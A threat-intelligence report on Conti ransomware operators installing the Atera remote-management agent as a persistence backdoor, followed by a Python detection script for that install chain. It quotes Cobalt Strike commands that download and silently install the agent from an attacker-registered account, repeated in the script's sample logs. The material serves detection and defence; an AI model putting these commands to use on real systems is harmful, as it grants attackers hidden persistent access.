# Secret "Backdoor" Behind Conti Ransomware Operation: Introducing Atera Agent

**[advanced-intel.com/post/secret-backdoor-behind-conti-ransomware-operation-introducing-atera-agent](https://www.advanced-intel.com/post/secret-backdoor-behind-conti-ransomware-operation-introducing-atera-agent)**

AdvIntel, August 11, 2021, 3 min read

**_By Vitali Kremez_**

_This report is based on our actual proactive victim breach intelligence and subsequent incident response (not a simulated or sandbox environment) identified via unique high-value collections at AdvIntel._

-----

**_Adversary Tactics Chain Flow:_**

1. Conti access via TrickBot, Buer, BazarBackdoor, AnchorDNS
2. Cobalt Strike beacon
3. Atera Agent installation
4. Persistence and shell execution to survive Cobalt Strike detections

-----

_Adversaries leverage Cobalt Strike command-line interfaces to interact with systems and execute other software during the course of a ransomware operation._

**_What is Atera?_**

_[Atera is an IT management solution that enables monitoring, management, and automation of hundreds of SMB IT networks from a single console. Atera includes remote control, patch management, discovery, inventory of IT assets, monitoring, security, backup, and more.](https://www.atera.com/features/#:~:text=Atera%20is%20an%20IT%20management,security%2C%20backup%2C%20and%20more)_

-----

**_Deploying Atera Agent as "Backdoor"_**

The idea behind this tactic is to leverage a legitimate remote management agent, Atera, to survive possible Cobalt Strike detections by the endpoint detection and response platform. Relying on a legitimate tool to achieve persistence is a core idea leveraged by the ransomware pentesting team.
-----

While reviewing Conti incidents that we proactively identified, monitored, and alerted on via our threat prevention platform Andariel, AdvIntel identified that Atera played the key role in allowing secret backdoor installations on the host right after the Conti gang obtained initial access via TrickBot, BazarBackdoor, AnchorDNS, or Cobalt Strike directly.

**_Conti Operational Handbook: Atera as Backdoor_**

The [disgruntled Conti operator leaked the tactics matching our proactive cases.](https://www.bleepingcomputer.com/news/security/angry-conti-ransomware-affiliate-leaks-gangs-attack-playbook/)

_The method includes the following steps as translated from the tutorial:_

1. Registration of the agent access via the official website
2. Click on download and set up agent access with the script
3. Run the agent installation via the Cobalt Strike “shell atera_run.msi”
4. Observe the device beacon in the Atera system
5. Remove the installation script artifacts

I. Cobalt Strike command via curl command execution for Atera Agent installation:

```
shell curl -o setup.msi "http://REDACTED.servicedesk.atera.com/GetAgent/Msi/?customerId=1&integratorLogin=REDACTED%40protonmail.com" && msiexec /i setup.msi /qn IntegratorLogin=REDACTED@protonmail.com CompanyId=1
```

-----

II. Cobalt Strike command via the uploaded .msi installer script exported from the Atera Agent console:

```
upload C:\programdata\setup_undefined.msi
shell setup_undefined.msi
```

**_Atera Agent "Backdoor" Relevancy_**

The Atera agent allows the following connection options for the ransomware groups to achieve persistence:

- Splashtop
- AnyDesk
- TeamViewer
- ScreenConnect

Additionally, the agent allows direct command-prompt and PowerShell shell execution into the agent-installed environment.
**_Operational Insight_**

The Atera Agent allowed the Conti gang to regain access to infected protected environments, especially environments that were equipped with more aggressive machine learning endpoint detection-and-response anti-virus products. The benefit is obvious: once Conti receives the desired access to the trial version of Atera with a burner account, they obtain a shell and backdoor access to the environment, maintained by a legitimate software tool.

_We assess with high confidence that the theme of leveraging tooling around legitimate and trusted software as a backdoor will continue to be a tactic leveraged by the ransomware pentester groups, based on their latest tactics._

-----

In most of the cases, the adversaries leveraged protonmail[.]com and outlook[.]com email accounts to register with Atera to receive an agent installation script and console access. Therefore, this backdoor access is not a central compromise of Atera, but rather a registration loophole leveraged by the adversaries to obtain Atera trial access simply via anonymous emails.

**_Mitigation_**

Audit and/or block command-line interpreters by using whitelisting tools such as AppLocker or Software Restriction Policies, with a focus on any suspicious “curl” command and unauthorized “.msi” installer scripts, particularly those run from the C:\ProgramData and C:\Temp directories.

**_Detection Methods_**

Command-line interface activities can be captured through proper logging of process execution with command-line arguments.

**_Reference_**

- Tactic: T1059 Command and Scripting Interpreter
- Tactic: T1127 Trusted Developer Utilities Proxy Execution

_Our proprietary platform, Andariel, provides a mirrored view of criminal and botnet activity, which supplies our users with predictive insight that is used to prevent intrusions from maturing into large-scale threat events such as ransomware attacks._

-----
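The two playbook commands and the Mitigation and Detection Methods sections above together describe what process-creation logging needs to surface: a curl download of an .msi, msiexec (or a bare .msi launched through cmd) installing it from C:\ProgramData or C:\Temp, and the Atera integrator parameters on the command line. The following Python is an added example, not part of the original report and not AdvIntel's or Atera's tooling. It runs four such rules over constructed process-creation events; the field names are borrowed from Sysmon Event ID 1, but the tab-separated line layout, the sample paths and the event order are assumptions made for the example. It also resolves relative installer paths against the recorded working directory, which matters because both playbook commands reference the .msi by bare filename.

```python
"""Flag the curl -> .msi -> msiexec Atera install chain in process-creation logs.

Added example (not AdvIntel's or Atera's code). Assumptions: telemetry is
exported one event per line as tab-separated key=value pairs using Sysmon
Event ID 1 field names (Image, CommandLine, CurrentDirectory); the sample
events below are constructed to mirror the two playbook commands.
"""
import ntpath
import re
from dataclasses import dataclass
from typing import Callable, List, Tuple

# Directories the report names as staging locations for the unauthorized .msi.
STAGING_DIRS = ("c:\\programdata\\", "c:\\temp\\")

# Constructed process-creation events (not real telemetry), one per line.
SAMPLE_LOG = """\
Image=C:\\Windows\\System32\\cmd.exe\tCommandLine=cmd.exe /C curl -o setup.msi "http://REDACTED.servicedesk.atera.com/GetAgent/Msi/?customerId=1&integratorLogin=REDACTED%40protonmail.com" && msiexec /i setup.msi /qn IntegratorLogin=REDACTED@protonmail.com CompanyId=1\tCurrentDirectory=C:\\ProgramData\\
Image=C:\\Windows\\System32\\curl.exe\tCommandLine=curl -o setup.msi "http://REDACTED.servicedesk.atera.com/GetAgent/Msi/?customerId=1&integratorLogin=REDACTED%40protonmail.com"\tCurrentDirectory=C:\\ProgramData\\
Image=C:\\Windows\\System32\\msiexec.exe\tCommandLine=msiexec /i setup.msi /qn IntegratorLogin=REDACTED@protonmail.com CompanyId=1\tCurrentDirectory=C:\\ProgramData\\
Image=C:\\Windows\\System32\\cmd.exe\tCommandLine=cmd.exe /C setup_undefined.msi\tCurrentDirectory=C:\\ProgramData\\
Image=C:\\Windows\\System32\\msiexec.exe\tCommandLine=msiexec /i "C:\\Program Files (x86)\\Vendor\\update.msi" /qn\tCurrentDirectory=C:\\Windows\\System32\\
Image=C:\\Windows\\System32\\curl.exe\tCommandLine=curl -s https://example.invalid/health\tCurrentDirectory=C:\\Users\\admin\\
"""


@dataclass
class ProcessEvent:
    image: str
    command_line: str
    current_directory: str


def parse_line(line: str) -> ProcessEvent:
    """Split a tab-separated key=value line. Partition on the first '=' only,
    so '=' inside the command line (IntegratorLogin=...) is preserved."""
    fields = {}
    for part in line.split("\t"):
        key, _, value = part.partition("=")
        fields[key] = value
    return ProcessEvent(
        image=fields.get("Image", ""),
        command_line=fields.get("CommandLine", ""),
        current_directory=fields.get("CurrentDirectory", ""),
    )


# Quoted path with spaces, or a bare token ending in .msi.
MSI_PATH_RE = re.compile(r'"([^"]+\.msi)"|(\S+\.msi)\b', re.I)
CURL_MSI_RE = re.compile(r'\bcurl(?:\.exe)?\b.*?\s(?:-o|--output)\s+"?[^\s"]+\.msi\b', re.I)
MSIEXEC_INSTALL_RE = re.compile(r"\bmsiexec(?:\.exe)?\b.*?\s/i\b", re.I)


def msi_paths(ev: ProcessEvent) -> List[str]:
    """Every .msi referenced on the command line, resolved against the process
    working directory when given as a bare or relative name (ntpath handles
    Windows path rules on any host OS)."""
    paths = []
    for quoted, bare in MSI_PATH_RE.findall(ev.command_line):
        paths.append(ntpath.normpath(ntpath.join(ev.current_directory, quoted or bare)))
    return paths


def rule_curl_msi_download(ev: ProcessEvent) -> bool:
    cmd = ev.command_line
    return bool(CURL_MSI_RE.search(cmd)) or "/getagent/msi" in cmd.lower()


def rule_msi_from_staging_dir(ev: ProcessEvent) -> bool:
    return any(p.lower().startswith(STAGING_DIRS) for p in msi_paths(ev))


def rule_atera_installer_parameters(ev: ProcessEvent) -> bool:
    lower = ev.command_line.lower()
    return "integratorlogin=" in lower or "companyid=" in lower


def rule_download_then_install_chain(ev: ProcessEvent) -> bool:
    cmd = ev.command_line
    return bool(re.search(r"\bcurl\b", cmd, re.I)) and bool(MSIEXEC_INSTALL_RE.search(cmd))


RULES: List[Tuple[str, Callable[[ProcessEvent], bool]]] = [
    ("curl_msi_download", rule_curl_msi_download),
    ("msi_from_staging_dir", rule_msi_from_staging_dir),
    ("atera_installer_parameters", rule_atera_installer_parameters),
    ("download_then_install_chain", rule_download_then_install_chain),
]


def detect(log_text: str) -> List[Tuple[int, str, List[str]]]:
    """Return (event index, image basename, fired rule names) for every event
    that trips at least one rule; events that trip none are dropped."""
    hits = []
    lines = [ln for ln in log_text.splitlines() if ln.strip()]
    for idx, line in enumerate(lines):
        ev = parse_line(line)
        fired = [name for name, rule in RULES if rule(ev)]
        if fired:
            hits.append((idx, ntpath.basename(ev.image), fired))
    return hits


if __name__ == "__main__":
    for idx, image, fired in detect(SAMPLE_LOG):
        print(f"event {idx} ({image}): {', '.join(fired)}")
```

Run stand-alone, the script flags the four constructed events that reproduce the playbook (the cmd.exe wrapper, the curl download, the msiexec install and the bare .msi launch) and leaves the vendor update from Program Files and the plain curl health check alone. The `msi_from_staging_dir` rule is the one that carries the report's mitigation advice; the other three exist so that an analyst can see which part of the chain each event represents when only some of the processes were logged.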